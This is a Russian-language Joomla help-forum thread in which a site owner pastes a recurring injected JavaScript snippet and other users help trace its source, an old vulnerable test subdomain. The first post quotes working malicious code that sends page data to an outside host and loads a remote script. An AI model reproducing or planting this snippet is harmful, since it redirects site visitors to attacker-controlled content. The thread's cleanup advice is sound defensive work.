Форум русской поддержки Joomla!® CMS
06.12.2016, 10:03:19 *
Добро пожаловать, Гость. Пожалуйста, войдите или зарегистрируйтесь.
Вам не пришло письмо с кодом активации?

Войти
   
   Начало   Поиск Joomla 3.0 FAQ Joomla 2.5 FAQ Joomla 1.5 FAQ Правила форума Новости Joomla Реклама Войти Регистрация Помощь  
Страниц: [1]   Вниз
  Добавить закладку  |  Печать  
Автор

Вирусняк на сайте, редиректит, Что делать? Где копать?

 (Прочитано 624 раз)
0 Пользователей и 1 Гость смотрят эту тему.
webwin12
Новичок
*

Репутация: +0/-0
Offline Offline

Сообщений: 5


« : 20.11.2015, 02:10:35 »

Вот такой кусок ***-кода прописывается в index.php шаблона каждый раз после его удаления.   

<script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http://RUBYROCKINGCHAIR.COM/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}</script>
</head>

Joomla 2.5.28
Сторонние компоненты: K2 Version 2.6.8, Phoca Maps. Модули: ARI Image Slider, Sj Contact AJAX.
Дата последнего входа в панель управления: 2015-11-19 20:54:05 - реально не был в это время.
Что делал пять дней назад:
Проверял на base64 файлы и сканил антивиром, айболитом, ничего не обнаружил.
Удалил *** код, поменял все пароли какие можно, запретил доступ в админку через htaccess (только по айпи).
Тишина дней пять, теперь опять.
Что делать? Где копать?    !

Записан
voland
Профи
********

Репутация: +487/-86
Offline Offline

Пол: Мужской
Сообщений: 8711


любит наш народ всякое гавно...


« Ответ #1 : 20.11.2015, 02:11:59 »

варез есть?
Записан
webwin12
Новичок
*

Репутация: +0/-0
Offline Offline

Сообщений: 5


« Ответ #2 : 20.11.2015, 02:18:25 »

Нет не варез.
Записан
voland
Профи
********

Репутация: +487/-86
Offline Offline

Пол: Мужской
Сообщений: 8711


любит наш народ всякое гавно...


« Ответ #3 : 20.11.2015, 02:21:38 »

Хм.. 15 баксов смартаддонс платили?
Записан
webwin12
Новичок
*

Репутация: +0/-0
Offline Offline

Сообщений: 5


« Ответ #4 : 20.11.2015, 02:32:54 »

Вы про Sj Contact AJAX, затрудняюсь ответить т.к. сайт достался по наследству. Так в чём может быть причина?
Записан
voland
Профи
********

Репутация: +487/-86
Offline Offline

Пол: Мужской
Сообщений: 8711


любит наш народ всякое гавно...


« Ответ #5 : 20.11.2015, 02:48:25 »

В том что сами установили бэкдор или тот кто сайт делал.
Записан
draff
Практически профи
*******

Репутация: +161/-5
Online Online

Пол: Мужской
Сообщений: 2652


step by step


« Ответ #6 : 20.11.2015, 07:51:59 »

Смотреть в логах хостинга запросы POST и проверять каждый файл, к которому запрос
Записан
wishlight
Профи
********

Репутация: +200/-1
Offline Offline

Пол: Мужской
Сообщений: 3487


skype aqaus.com


« Ответ #7 : 20.11.2015, 10:26:55 »

Выставьте Айболит на параноидальный уровень проверки и проверьте. Что-то по любому есть. Хотя может заражаться с других сайтов аккаунта если такие есть. Securitycheck можно поставить и проверить в его списке уязвимости расширений.
Записан
webwin12
Новичок
*

Репутация: +0/-0
Offline Offline

Сообщений: 5


« Ответ #8 : 22.11.2015, 00:12:30 »

Выставьте Айболит на параноидальный уровень проверки и проверьте. Что-то по любому есть. Хотя может заражаться с других сайтов аккаунта если такие есть. Securitycheck можно поставить и проверить в его списке уязвимости расширений.
Спасибо за наводку, так оно и было т.е. был тестовый поддомен типа test.site.ru, его не юзали вообще года два наверное, там была Joomla старой версии вообще 1.5.... Короче что там было долго объяснять, кошмар одним словом, куча левых файлов типа  defines.php.suspected прям в корне. Еще раз спасибо!
Записан
wishlight
Профи
********

Репутация: +200/-1
Offline Offline

Пол: Мужской
Сообщений: 3487


skype aqaus.com


« Ответ #9 : 22.11.2015, 04:16:52 »

На будущее советую все сайты держать отдельно по пользователям или хотя бы open_basedir.
Записан
webwin12
Новичок
*

Репутация: +0/-0
Offline Offline

Сообщений: 5


« Ответ #10 : 22.11.2015, 13:29:20 »

ОК)
Записан
Страниц: [1]   Вверх
  Добавить закладку  |  Печать  
 
Перейти в:  

Powered by SMF 1.1.21 | SMF © 2006, Simple Machines

Joomlaforum.ru is not affiliated with or endorsed by the Joomla! Project or Open Source Matters.
The Joomla! name and logo is used under a limited license granted by Open Source Matters
the trademark holder in the United States and other countries.

LiveInternet